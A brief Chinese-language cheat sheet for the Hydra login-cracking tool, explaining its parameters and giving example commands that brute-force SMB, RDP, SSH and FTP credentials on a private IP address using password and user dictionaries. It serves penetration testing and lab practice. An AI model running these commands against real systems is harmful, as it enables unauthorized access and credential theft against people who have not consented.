hydra 远程破解工具
一、常用参数:
-l 后面跟着 具体的用户名
-p 后面跟着 具体的密码
-L 后面跟着 用户字典
-P 后面跟着 密码字典
二、案例展示
1、爆破smb服务
hydra -l Administrator -P pass.txt smb://172.172.11.209
2、爆破3389远程桌面
hydra -l Administrator -P pass.txt rdp://172.172.11.209 -V
3、一般爆破RDP最后别选择多进程、多线程
hydra -l Administrator -P pass.txt rdp://172.172.11.209 -t 1 -V
4、爆破ssh服务
hydra -l msfadmin -P pass.txt ssh://172.172.11.209 -vV
5、用户名和密码同时爆破
hydra -L user.txt -P pass.txt ftp://172.172.11.209 -s 2121 -e nsr -t 1 -vV
三、参数信息说明
-s 指定服务端口
-R 根据上一次进度继续破解
-S 使用SSL协议连接
-s 指定端口
-l 指定用户名
-L 指定用户名字典(文件)
-p 指定密码破解
-P 指定密码字典(文件)
-e 空密码探测和指定用户密码探测(ns)
-C 用户名可以用:分割(username:password)可以代替-l username -p password
-o 输出文件
-t 指定多线程数量,默认为16个线程
-vV 显示详细过程
server 目标IP
service 指定服务名(telnet ftp pop3 mssql mysql ssh ssh2…)